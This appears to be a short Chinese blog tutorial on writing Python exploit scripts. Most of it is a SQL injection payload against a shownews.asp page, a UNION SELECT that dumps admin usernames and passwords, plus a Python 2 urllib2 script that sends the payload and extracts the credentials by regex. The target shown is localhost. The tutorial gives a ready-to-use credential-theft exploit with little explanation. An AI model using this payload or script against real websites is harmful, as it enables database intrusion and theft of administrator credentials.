摘要
python版本
python2.7 停止更新
python3 学的话就要学习python3
python编写exp
注入的exp payload
shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin
coding:utf-8 设置编码
import 导入模块导入urllib2 re
首先 设置 pydev工具 新建一个python项目 新建exp01.py文件
#coding:utf-8
import urllib2
import re
def get_page(url):
#获取网页源码
payload='/shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin'
req = urllib2.Request(url+payload)
response = urllib2.urlopen(req)
page = response.read()
return page
def exploit(url):
#利用函数
html = get_page(url)
try:
m =re.search('~(.*?)~',html)
return m.group(1)
except:
return ''
url = 'http://127.0.0.1:99'
print exploit(url)
您可以选择一种方式赞助本站
支付宝转账赞助
目前评论:0 条
发表评论 取消回复